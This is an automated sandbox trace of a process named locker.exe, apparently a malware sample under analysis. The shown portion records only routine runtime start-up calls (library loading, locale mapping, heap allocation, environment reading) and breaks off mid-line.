# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 28.10.2020 12:51:07.643 Process: id = "1" image_name = "locker.exe" filename = "c:\\users\\fd1hvy\\desktop\\locker.exe" page_root = "0xa05f000" os_pid = "0x1170" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x116c [0078.453] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0078.454] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0078.455] GetProcAddress (hModule=0x74bc0000, lpProcName=0x37326c) returned 0x74cb7060 [0078.455] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0078.456] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsAlloc") returned 0x74cbbea0 [0078.456] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsSetValue") returned 0x74cb2550 [0078.458] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0078.458] GetProcAddress (hModule=0x74bc0000, lpProcName="InitializeCriticalSectionEx") returned 0x74cb7060 [0078.458] GetProcessHeap () returned 0x3c0000 [0078.458] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0078.458] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsAlloc") returned 0x74cbbea0 [0078.459] GetLastError () returned 0xcb [0078.459] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsGetValue") returned 0x74ca70c0 [0078.459] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x3e7af0 [0078.459] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsSetValue") returned 0x74cb2550 [0078.459] SetLastError (dwErrCode=0xcb) [0078.460] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xc00) returned 0x3e7e60 [0078.554] GetStartupInfoW (in: lpStartupInfo=0xdcfe08 | out: lpStartupInfo=0xdcfe08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\locker.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0078.554] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0078.554] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0078.554] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0078.554] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" " [0078.554] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" " [0078.554] GetLastError () returned 0xcb [0078.554] SetLastError (dwErrCode=0xcb) [0078.554] GetLastError () returned 0xcb [0078.554] SetLastError (dwErrCode=0xcb) [0078.554] GetACP () returned 0x4e4 [0078.554] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x220) returned 0x3d3f38 [0078.554] IsValidCodePage (CodePage=0x4e4) returned 1 [0078.554] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xdcfe38 | out: lpCPInfo=0xdcfe38) returned 1 [0078.554] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xdcf700 | out: lpCPInfo=0xdcf700) returned 1 [0078.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdcfd14, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdcfd14, cbMultiByte=256, lpWideCharStr=0xdcf498, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0078.554] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0xdcf714 | out: lpCharType=0xdcf714) returned 1 [0078.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdcfd14, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdcfd14, cbMultiByte=256, lpWideCharStr=0xdcf448, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0078.554] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0078.555] GetProcAddress (hModule=0x74bc0000, lpProcName="LCMapStringEx") returned 0x74c9ed00 [0078.555] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0078.555] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0xdcf238, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0078.555] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0xdcfc14, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿE¶õsPþÜ", lpUsedDefaultChar=0x0) returned 256 [0078.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdcfd14, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdcfd14, cbMultiByte=256, lpWideCharStr=0xdcf468, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0078.555] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0078.555] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0xdcf258, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0078.555] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0xdcfb14, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿE¶õsPþÜ", lpUsedDefaultChar=0x0) returned 256 [0078.555] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x3c6760 [0078.555] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x38d530, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0078.555] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x2b) returned 0x3d2c50 [0078.556] RtlInitializeSListHead (in: ListHead=0x38cec8 | out: ListHead=0x38cec8) [0078.556] GetLastError () returned 0x0 [0078.556] SetLastError (dwErrCode=0x0) [0078.556] GetEnvironmentStringsW () returned 0x3e8a68* [0078.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x565) returned 0x3e4fa8 [0078.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x3e4fa8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0078.556] FreeEnvironmentStringsW (penv=0x3e8a68) returned 1 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x94) returned 0x3ce640 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1f) returned 0x3e00f0 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x3d7b50 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x37) returned 0x3e0d18 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x3c) returned 0x3d22c8 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x31) returned 0x3e0e98 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x3daf48 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x24) returned 0x3d7a90 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xd) returned 0x3e6be8 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x17) returned 0x3dad68 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x2b) returned 0x3d2c88 [0078.556] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x15) returned 0x3dad88 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x17) returned 0x3dafe8 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x22) returned 0x3d7ac0 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xe) returned 0x3e6ba0 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xc1) returned 0x3d2430 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x3e) returned 0x3d2118 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1b) returned 0x3e03e8 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1d) returned 0x3e0208 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x48) returned 0x3d7368 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x12) returned 0x3dada8 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x18) returned 0x3daea8 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1b) returned 0x3dff38 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x24) returned 0x3d7c40 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x29) returned 0x3d26a0 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1e) returned 0x3e00a0 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x6b) returned 0x3cf050 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x17) returned 0x3dae08 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xf) returned 0x3e6b88 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x16) returned 0x3daec8 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x3d7c70 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x27) returned 0x3d7cd0 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x12) returned 0x3daee8 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x21) returned 0x3d7b20 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x10) returned 0x3e6bb8 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1c) returned 0x3dffd8 [0078.557] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x12) returned 0x3dad28 [0078.557] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e4fa8 | out: hHeap=0x3c0000) returned 1 [0078.557] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0078.558] GetProcAddress (hModule=0x772d0000, lpProcName="FlsAlloc") returned 0x772e4ae0 [0078.558] GetProcAddress (hModule=0x772d0000, lpProcName="FlsFree") returned 0x772e4b00 [0078.558] GetProcAddress (hModule=0x772d0000, lpProcName="FlsGetValue") returned 0x772e4b20 [0078.558] GetProcAddress (hModule=0x772d0000, lpProcName="FlsSetValue") returned 0x772e4b40 [0078.558] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7733ebc0 [0078.558] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0078.558] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventExW") returned 0x7733eb20 [0078.559] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSemaphoreW") returned 0x7733eb90 [0078.559] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSemaphoreExW") returned 0x7733eb80 [0078.559] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolTimer") returned 0x772e6d30 [0078.559] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolTimer") returned 0x779bd7c0 [0078.559] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bb840 [0078.559] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolTimer") returned 0x779bb740 [0078.559] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolWait") returned 0x772e6d70 [0078.559] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadpoolWait") returned 0x779bc0b0 [0078.560] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolWait") returned 0x779bbe10 [0078.560] GetProcAddress (hModule=0x772d0000, lpProcName="FlushProcessWriteBuffers") returned 0x779e2b20 [0078.560] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779d8e50 [0078.560] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessorNumber") returned 